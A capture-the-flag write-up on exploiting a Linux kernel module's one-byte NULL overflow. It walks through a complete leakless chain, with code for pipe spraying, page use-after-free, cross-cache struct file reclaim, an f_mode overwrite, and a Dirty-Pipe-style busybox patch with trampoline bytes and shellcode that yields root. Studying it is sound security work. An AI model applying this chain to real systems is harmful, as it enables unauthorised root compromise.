TL;DR

A single-byte NULL off-by-one in a kmalloc-1024 object is leveraged into a pipe_buffer.page LSB clear → page-level UAF → cross-cache reclaim into filp_cachepstruct file->f_mode overwrite → page-cache code injection into /bin/busybox (Dirty-Pipe style) → root code execution. Fully leakless: no kernel address is ever read.

Description: Make a contract and become a magical girl!

Target: Linux 6.17.7, x86-64. Mitigations on: SMEP, SMAP, KPTI (pti=on), KASLR, dmesg_restrict=1, kptr_restrict=1. The interactive shell runs as uid 1000.

Challenge setup

The distribution ships bzImage, vmlinux, initramfs.cpio and run.sh. QEMU boots with the usual hardening:

qemu-system-x86_64 \
    -kernel bzImage -initrd initramfs.cpio \
    -cpu qemu64,+smap,+smep -smp 1 -m 256M \
    -append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on" \
    -no-reboot -nographic -monitor /dev/null -enable-kvm

The init script defines the threat model:

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict      # no dmesg -> any %px leak is useless
chmod 600 flag.txt                            # /flag.txt readable by root only
insmod /driver/qb.ko
setsid cttyhack setuidgid 1000 /bin/sh        # our shell is UNPRIVILEGED (uid 1000)
poweroff -d 1 -n -f                           # <-- runs as ROOT when our shell exits

Two facts shape the whole exploit:

  • We are uid 1000; the flag is root-only, so we need root code execution.
  • When our shell exits, init (PID 1, root) runs poweroff -f. That is our eventual root trigger.

The module

qb.ko is not stripped. It registers the misc device /dev/QB with a single unlocked_ioctl handler and three globals:

char         *puregem;        // a single kmalloc-1024 object, zero-initialised, alloc-once, never freed
int           griefseed_num;  // a counter, written by CHECK, read nowhere
struct mutex  LOCK;

The file_operations only wires .unlocked_ioctl = qb_ioctl. There is no open, release, read, write, mmap, and crucially no kfree and no copy_to_user anywhere in the module.

#define QB_ALLOC 0x16C0   // "sign the contract"
#define QB_CLEAR 0x16C1   // "purify the soul gem"   <-- the bug lives here
#define QB_CHECK 0x16C2   // "attack the witch"

long qb_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    mutex_lock(&LOCK);

    if (cmd == QB_ALLOC) {                        // 0x16C0
        struct contract { char name[16]; char wish[48]; } req;  // 0x40 bytes
        if (copy_from_user(&req, arg, sizeof(req)) == 0 && !puregem) {
            // kmalloc_caches[NORMAL][10] == kmalloc-1024, GFP_KERNEL|__GFP_ZERO
            puregem = __kmalloc_cache_noprof(kmalloc_caches[10], 0xdc0, 0x400);
            printk("[QB] Name: %.16s, Wish: %.30s\n", req.name, req.wish);
            printk("[QB] puregem pointer: %px\n", puregem);   // leak, but dmesg_restrict kills it
            // NOTE: req is never stored into puregem, only logged.
        }
    }
    else if (cmd == QB_CLEAR) {                   // 0x16C1
        unsigned int size;
        if (copy_from_user(&size, arg, 4) == 0 && puregem && size <= 0x400) {
            memset(puregem, 0, size + 1);         // size==0x400 -> writes 0x401 bytes
        }
    }
    else if (cmd == QB_CHECK) {                   // 0x16C2
        int v[5];
        if (copy_from_user(v, arg, 0x14) == 0 && puregem) {
            int sum = v[0]*0xDE + v[1]*0x67 + v[2]*0x25D + v[3]*0x398 + v[4]*0x1FD;
            if (sum != 0x259B) BUG();             // gate, no heap effect
            griefseed_num++;
        }
    }

    mutex_unlock(&LOCK);
    return ...;
}
ioctl role
QB_ALLOC creates the single kmalloc-1024 object puregem (once). User data is not stored, only printed. The %px leak is dead (dmesg_restrict).
QB_CLEAR the bug. memset(puregem, 0, size+1).
QB_CHECK a gate that must be passed (it BUG()s otherwise) but has no heap effect.

The QB_CHECK gate requires 0xDE*v0 + 0x67*v1 + 0x25D*v2 + 0x398*v3 + 0x1FD*v4 == 0x259B. Any solution works, e.g. {5, 7, 8, 1, 4} (5·222 + 7·103 + 8·605 + 1·920 + 4·509 = 9627 = 0x259B). It must be passed before the overflow so we don’t trip the BUG().

Vulnerability

QB_CLEAR validates the length with > instead of >=:

if (size > 0x400) { /* reject */ }      // accepts size == 0x400
...
memset(puregem, 0, size + 1);           // size==0x400 -> memset of 0x401 bytes

puregem is a kmalloc(0x400) buffer (1024 bytes, indices 0x000..0x3FF). With size == 0x400, memset writes 0x401 bytes → index 0x400 lands one byte past the buffer, writing 0.

Because puregem is allocated __GFP_ZERO and never written, the entire memset is a no-op except for that one byte hitting the first byte of the adjacent kmalloc-1024 object. This is a deterministic, replayable, single NULL-byte overflow.

Object collision in kmalloc-1024

A pipe keeps a ring of pipe_buffer descriptors (default PIPE_DEF_BUFFERS = 16), allocated as one array:

struct pipe_buffer {
    struct page *page;                       /* +0x00  <-- our NULL byte hits its LSB */
    unsigned int offset, len;                /* +0x08, +0x0C */
    const struct pipe_buf_operations *ops;   /* +0x10 */
    unsigned int flags;                      /* +0x18 */
    unsigned long private;                   /* +0x20 */
};                                           /* 40 bytes */

16 * 40 = 640 bytes → lands in kmalloc-1024, the same cache as puregem. By grooming the slab so puregem’s neighbour is a pipe_buffer array, the NULL byte clears the LSB of pipe_buffer[0].page.

Page-pointer LSB clear (PageJack-style)

The kernel keeps a struct page descriptor for every physical page in the flat vmemmap array. Since sizeof(struct page) == 0x40, every valid struct page * is 0x40-aligned, so clearing its low byte re-aligns the pointer by 0-3 entries, so it now describes a nearby physical page, 0-3 PFNs away. With a dense pipe spray, that neighbouring page reliably belongs to another pipe.

The bytes you write() into a pipe live in page (a separate 4 KiB page), so the redirected pipe_buffer now reads/writes another pipe’s data page. No PTE is involved: the corruption is purely in the kernel pointer dereferenced for pipe I/O.

Pipe append semantics and the marker design

A pipe_buffer tracks offset (read position) and len (unread bytes). The next write() appends at page + offset + len; a read() that leaves len > 0 advances offset but does not call pipe_buf_release/put_page. This drives the whole detection-and-corruption dance.

Each pipe is tagged with 2 + 2 bytes:

uint16_t mark = MARK_BASE + i;
write(pipes[i][1], &mark, sizeof(mark));   // 2 bytes: unique marker
write(pipes[i][1], "23", 2);               // 2 bytes: padding
  • The 2-byte marker identifies the pipe’s data page (leakless detection below).
  • The 2-byte padding keeps the buffer non-empty after detection reads 2 bytes, and positions the write cursor at offset 4 for the later f_mode overwrite.

The buffer ends at offset=0, len=4. The detection scan reads 2 bytes, leaving offset=2, len=2 → still offset + len == 4, page not released. The final corruption write then lands at page offset 4.

Cross-cache: filp_cachep and the buddy allocator

struct file lives in its own dedicated cache, filp_cachep. Slab caches are isolated at the slab layer but all pull backing pages from the same buddy allocator: a page freed by kmalloc-1024 (the pipe data page) can be reissued to filp_cachep on its next refill. That is how we reach a struct file without any in-module free primitive.

struct file {
    spinlock_t                    f_lock;     /* +0x00 (4 bytes) */
    fmode_t                       f_mode;     /* +0x04  <-- target */
    const struct file_operations *f_op;       /* +0x08 */
    /* ... */
};

f_mode sits at offset 4 (confirmed with pahole -C file vmlinux, and empirically: a write at page-offset 4 flips writability). vfs_write() returns -EBADF unless f_mode & FMODE_WRITE. We overwrite f_mode with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | FMODE_LSEEK | FMODE_OPENED | FMODE_CAN_*), turning a O_RDONLY busybox handle into a writable one.

Busybox recon: cave, reboot wrapper, trampoline, shellcode

busybox is No PIE (ET_EXEC, base 0x400000), so file_offset = vaddr − 0x400000.

init runs poweroff -f, which calls the reboot() syscall. We locate busybox’s reboot wrapper by its magics:

$ objdump -d -M intel busybox | grep 0xfee1dead
  48bf90: f3 0f 1e fa      endbr64                 <-- function entry (OFF_TRAMP)
  48bf94: 89 fa            mov edx,edi             ;  cmd
  48bf96: be 69 19 12 28   mov esi,0x28121969      ;  MAGIC2
  48bf9b: bf ad de e1 fe   mov edi,0xfee1dead      ;  MAGIC1
  48bfa0: b8 a9 00 00 00   mov eax,0xa9            ;  __NR_reboot (169)
  48bfa5: 0f 05            syscall

The reboot entry 0x48bf90 has 11 bytes before the next instruction, enough for a 10-byte trampoline. There is no 64-byte run of padding in this dense binary, so we sacrifice a function: scanning endbr64 entries with enough room yields 0x5df693 (0xAA bytes) as a code cave.

Trampoline (overwrites the reboot entry, jumps into the cave):

mov r8, 0x5df693
jmp r8

49 c7 c0 93 f6 5d 00 41 ff e0 (10 bytes).

Shellcode, self-contained execve("/bin/sh"), built on the stack (the root poweroff process has a valid stack), 48 bytes, fits the 0xAA cave:

from pwn import *
context.arch = 'amd64'
sc = asm(shellcraft.amd64.linux.sh())

Exploitation

Step 1: sandwich puregem between pipe rings

puregem is allocated between two halves of the pipe spray, so its neighbour is reliably a pipe_buffer array rather than a slab edge:

spray_pipes(0, N_PIPE_HALF);         // 0x40 pipes
qb_alloc(fd, name, wish);            // puregem in the middle
spray_pipes(N_PIPE_HALF, N_PIPE);    // 0x40 more
qb_check(fd);                        // pass the gate first
qb_clear(fd, 0x400);                 // FIRE: NULL byte on pipe_buffer[0].page

Step 2: leakless alias detection

Exactly one pipe’s page now points to another pipe’s page. We read each marker back; the corrupted pipe returns somebody else’s marker:

int detect_alias(int *overlap, int *origin) {
    for (int i = 0; i < N_PIPE; i++) {
        unsigned short val = 0;
        if (read(pipes[i][0], &val, sizeof(val)) != sizeof(val)) continue;
        if (val == (unsigned short)(MARK_BASE + i)) continue;     // healthy
        int cand = (int)val - MARK_BASE;                          // whose page?
        if (cand >= 0 && cand < N_PIPE && cand != i) {
            *overlap = i; *origin = cand;
            return 1;
        }
    }
    return 0;
}

The cand validation discards the case where the byte landed on an unrelated page. No kernel address is ever read. This is what makes the exploit leakless. Each read consumes 2 of 4 bytes, so neither page is released; overlap and origin both reference the shared page.

Step 3: free the shared page (page UAF)

close(pipes[origin][0]);
close(pipes[origin][1]);    // pipe_release -> put_page; page returns to buddy

The overlap pipe still holds a stale .page pointing at the freed page: page-level use-after-free.

Step 4: cross-cache reclaim into filp

void spray_files(void) {
    for (int i = 0; i < N_FILE; i++)             // N_FILE = 0x50
        file_fds[i] = open("/bin/busybox", O_RDONLY);
}

filp_cachep grabs fresh slab pages; one reuses the freed page and fills it with struct files. The struct file at page offset 0 has its f_mode at page offset 4.

Step 5: overwrite f_mode through the dangling pipe

void corrupt_fmode(int overlap) {
    uint32_t fmode = FAKE_FMODE;                 // 0x084f801f
    write(pipes[overlap][1], &fmode, sizeof(fmode));  // appends at page offset 4 = f_mode
}

Had we written only the 2-byte marker, reading 2 bytes would drain the buffer (len == 0), pipe_buf_release() would drop the corrupted page, and the next write would go to a fresh page. The 2-byte padding keeps the page attached and aligns this write onto f_mode.

Step 6: find the writable handle

Only the struct file at page offset 0 was corrupted. We probe each fd non-destructively (read a byte, write it back); only the corrupted one accepts the write:

int find_writable(void) {
    for (int i = 0; i < N_FILE; i++) {
        unsigned char b;
        pread(file_fds[i], &b, 1, 0);
        if (pwrite(file_fds[i], &b, 1, 0) == 1)   // FMODE_WRITE set -> writable
            return file_fds[i];
    }
    return -1;
}

Step 7: page-cache code injection (Dirty-Pipe style)

Writing through the corrupted (now writable) struct file modifies /bin/busybox’s page cache. Busybox text is mapped from that same page cache (shared, no COW for text), so the patch is seen by any process that execs busybox:

#define OFF_SHELL (0x5df693 - 0x400000)   // cave  -> shellcode
#define OFF_TRAMP (0x48bf90 - 0x400000)   // reboot entry -> trampoline

patch_busybox(fd_corrupt, OFF_SHELL, shellcode,  sizeof(shellcode)  - 1);
patch_busybox(fd_corrupt, OFF_TRAMP, trampoline, sizeof(trampoline) - 1);

Step 8: trigger root

The exploit only patches and returns. We then type exit:

exit  ->  init (root) runs `poweroff -d 1 -n -f`
      ->  executes patched busybox
      ->  reboot() entry is now our trampoline
      ->  jmp 0x5df693  ->  execve("/bin/sh")  ->  ROOT shell on the console

reboot() never runs (we jumped away), so the box doesn’t power off; we get an interactive root shell instead.

Notes & lessons

What was already familiar. PageJack (page-level UAF by clearing the LSB of pipe_buffer.page) and Dirty Pipe (writing into a file’s page cache to patch a shared executable) were techniques I already knew going in. They are the bookends of this chain, not the part I learned.

What I actually learned: corrupting struct file. The novel piece for me was the bridge between those two techniques: turning a page-level UAF into an arbitrary page-cache write by hijacking a struct file. The specific lessons:

  • f_mode is a privilege bit you can flip. A struct file opened O_RDONLY only lacks FMODE_WRITE; the underlying inode and page cache are otherwise fully reachable. Overwriting f_mode (offset 4) with 0x084f801f (FMODE_WRITE | FMODE_PWRITE | ...) is enough to make vfs_write/pwrite accept the handle. No f_op hijack, no ROP: a single 4-byte write converts a read-only fd into a writable one.
  • struct file is a great cross-cache landing target. Spraying open("/bin/busybox") fills filp_cachep with predictable struct files; the one at page offset 0 puts f_mode exactly at the offset our dangling pipe writes to. The reclaim is reliable and needs no leak to confirm: I just probe each fd with a non-destructive read/write-back and watch which one becomes writable.
  • A writable handle on a shared binary == Dirty Pipe. Once the O_RDONLY busybox fd is writable, pwrite lands straight in busybox’s page cache, which is shared (no COW for text) with every process that execs it. That is what let me rewrite /bin/busybox and get root’s poweroff to run my shellcode. The corruption of struct file is the thing that made the Dirty-Pipe-style finish possible here.

References